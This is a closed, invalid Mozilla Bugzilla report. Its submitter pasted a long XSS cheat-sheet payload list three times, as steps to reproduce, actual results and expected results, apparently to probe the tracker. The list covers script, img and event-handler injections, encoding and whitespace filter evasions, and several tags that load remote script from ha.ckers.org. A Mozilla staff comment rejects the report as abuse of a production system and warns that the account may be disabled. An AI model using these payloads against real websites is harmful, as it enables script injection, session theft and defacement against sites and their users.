Closed
Bug 1271089
Opened 8 years ago
Closed 8 years ago
'+prompt(/XSSPOSSED/)+'
Categories
(Invalid Bugs :: General, defect)
Invalid Bugs
General
Tracking
(Not tracked)
RESOLVED
INVALID
People
(Reporter: Wereforaten1954, Unassigned)
Details
Attachments
(1 file)
5.83 KB,
text/csv
|
Details |
User Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36 OPR/37.0.2178.32 Steps to reproduce: '+prompt(/XSSPOSSED/)+' "><img src=x onerror=prompt(1)> "onmouseover="confirm(document.domain);"" <body onload=prompt("Hmz")> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ---------------------------------------------------------------------- '';!--"<XSS>=&{()} ---------------------------------------------------------------------- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ---------------------------------------------------------------------- <IMG SRC="javascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC=javascript:alert('XSS')> ---------------------------------------------------------------------- <IMG SRC=JaVaScRiPt:alert('XSS')> ---------------------------------------------------------------------- <IMG SRC=javascript:alert(&quot;XSS&quot;)> ---------------------------------------------------------------------- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> ---------------------------------------------------------------------- <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> ---------------------------------------------------------------------- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> ---------------------------------------------------------------------- <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> ---------------------------------------------------------------------- <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> ---------------------------------------------------------------------- <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> ---------------------------------------------------------------------- <IMG SRC="jav	ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC="jav&#x09;ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC="jav&#x0A;ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC="jav&#x0D;ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
 ---------------------------------------------------------------------- perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out ---------------------------------------------------------------------- perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out ---------------------------------------------------------------------- <IMG SRC=" &#14; javascript:alert('XSS');"> ---------------------------------------------------------------------- <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> ---------------------------------------------------------------------- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> ---------------------------------------------------------------------- <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> ---------------------------------------------------------------------- <<SCRIPT>alert("XSS");//<</SCRIPT> ---------------------------------------------------------------------- <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> ---------------------------------------------------------------------- <SCRIPT SRC=//ha.ckers.org/.j> ---------------------------------------------------------------------- <IMG SRC="javascript:alert('XSS')" ---------------------------------------------------------------------- <iframe src=http://ha.ckers.org/scriptlet.html < ---------------------------------------------------------------------- <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> ---------------------------------------------------------------------- \";alert('XSS');// ---------------------------------------------------------------------- </TITLE><SCRIPT>alert("XSS");</SCRIPT> ---------------------------------------------------------------------- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> ---------------------------------------------------------------------- <BODY BACKGROUND="javascript:alert('XSS')"> ---------------------------------------------------------------------- <BODY ONLOAD=alert('XSS')> ---------------------------------------------------------------------- <IMG LOWSRC="javascript:alert('XSS')"> ---------------------------------------------------------------------- <BGSOUND SRC="javascript:alert('XSS');"> ---------------------------------------------------------------------- <BR SIZE="&{alert('XSS')}"> ---------------------------------------------------------------------- <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> ---------------------------------------------------------------------- <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> Actual results: '+prompt(/XSSPOSSED/)+' "><img src=x onerror=prompt(1)> "onmouseover="confirm(document.domain);"" <body onload=prompt("Hmz")> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ---------------------------------------------------------------------- '';!--"<XSS>=&{()} ---------------------------------------------------------------------- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ---------------------------------------------------------------------- <IMG SRC="javascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC=javascript:alert('XSS')> ---------------------------------------------------------------------- <IMG SRC=JaVaScRiPt:alert('XSS')> ---------------------------------------------------------------------- <IMG SRC=javascript:alert(&quot;XSS&quot;)> ---------------------------------------------------------------------- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> ---------------------------------------------------------------------- <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> ---------------------------------------------------------------------- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> ---------------------------------------------------------------------- <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> ---------------------------------------------------------------------- <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> ---------------------------------------------------------------------- <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> ---------------------------------------------------------------------- <IMG SRC="jav	ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC="jav&#x09;ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC="jav&#x0A;ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC="jav&#x0D;ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
 ---------------------------------------------------------------------- perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out ---------------------------------------------------------------------- perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out ---------------------------------------------------------------------- <IMG SRC=" &#14; javascript:alert('XSS');"> ---------------------------------------------------------------------- <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> ---------------------------------------------------------------------- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> ---------------------------------------------------------------------- <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> ---------------------------------------------------------------------- <<SCRIPT>alert("XSS");//<</SCRIPT> ---------------------------------------------------------------------- <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> ---------------------------------------------------------------------- <SCRIPT SRC=//ha.ckers.org/.j> ---------------------------------------------------------------------- <IMG SRC="javascript:alert('XSS')" ---------------------------------------------------------------------- <iframe src=http://ha.ckers.org/scriptlet.html < ---------------------------------------------------------------------- <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> ---------------------------------------------------------------------- \";alert('XSS');// ---------------------------------------------------------------------- </TITLE><SCRIPT>alert("XSS");</SCRIPT> ---------------------------------------------------------------------- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> ---------------------------------------------------------------------- <BODY BACKGROUND="javascript:alert('XSS')"> ---------------------------------------------------------------------- <BODY ONLOAD=alert('XSS')> ---------------------------------------------------------------------- <IMG LOWSRC="javascript:alert('XSS')"> ---------------------------------------------------------------------- <BGSOUND SRC="javascript:alert('XSS');"> ---------------------------------------------------------------------- <BR SIZE="&{alert('XSS')}"> ---------------------------------------------------------------------- <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> ---------------------------------------------------------------------- <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> Expected results: '+prompt(/XSSPOSSED/)+' "><img src=x onerror=prompt(1)> "onmouseover="confirm(document.domain);"" <body onload=prompt("Hmz")> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ---------------------------------------------------------------------- '';!--"<XSS>=&{()} ---------------------------------------------------------------------- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ---------------------------------------------------------------------- <IMG SRC="javascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC=javascript:alert('XSS')> ---------------------------------------------------------------------- <IMG SRC=JaVaScRiPt:alert('XSS')> ---------------------------------------------------------------------- <IMG SRC=javascript:alert(&quot;XSS&quot;)> ---------------------------------------------------------------------- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> ---------------------------------------------------------------------- <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> ---------------------------------------------------------------------- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> ---------------------------------------------------------------------- <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> ---------------------------------------------------------------------- <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> ---------------------------------------------------------------------- <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> ---------------------------------------------------------------------- <IMG SRC="jav	ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC="jav&#x09;ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC="jav&#x0A;ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG SRC="jav&#x0D;ascript:alert('XSS');"> ---------------------------------------------------------------------- <IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
 ---------------------------------------------------------------------- perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out ---------------------------------------------------------------------- perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out ---------------------------------------------------------------------- <IMG SRC=" &#14; javascript:alert('XSS');"> ---------------------------------------------------------------------- <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> ---------------------------------------------------------------------- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> ---------------------------------------------------------------------- <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> ---------------------------------------------------------------------- <<SCRIPT>alert("XSS");//<</SCRIPT> ---------------------------------------------------------------------- <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> ---------------------------------------------------------------------- <SCRIPT SRC=//ha.ckers.org/.j> ---------------------------------------------------------------------- <IMG SRC="javascript:alert('XSS')" ---------------------------------------------------------------------- <iframe src=http://ha.ckers.org/scriptlet.html < ---------------------------------------------------------------------- <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> ---------------------------------------------------------------------- \";alert('XSS');// ---------------------------------------------------------------------- </TITLE><SCRIPT>alert("XSS");</SCRIPT> ---------------------------------------------------------------------- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> ---------------------------------------------------------------------- <BODY BACKGROUND="javascript:alert('XSS')"> ---------------------------------------------------------------------- <BODY ONLOAD=alert('XSS')> ---------------------------------------------------------------------- <IMG LOWSRC="javascript:alert('XSS')"> ---------------------------------------------------------------------- <BGSOUND SRC="javascript:alert('XSS');"> ---------------------------------------------------------------------- <BR SIZE="&{alert('XSS')}"> ---------------------------------------------------------------------- <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> ---------------------------------------------------------------------- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Comment 1•8 years ago
|
||
This is a production bug database used by the Mozilla community to develop Firefox, and other products. It is not a test system or something to play with. Please use http://landfill.bugzilla.org/ if you want to test things. If you continue to abuse bugzilla.mozilla.org your account will be disabled. If you really wanted to report a valid bug in one of Mozilla's application and services, please read please https://developer.mozilla.org/en-US/docs/Mozilla/QA/Bug_writing_guidelines and create a bug report with a way better and useful description.
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Component: Build Config → General
Product: Thunderbird → Invalid Bugs
Resolution: --- → INVALID
Version: 1.0 → unspecified
You need to log in
before you can comment on or make changes to this bug.
Description
•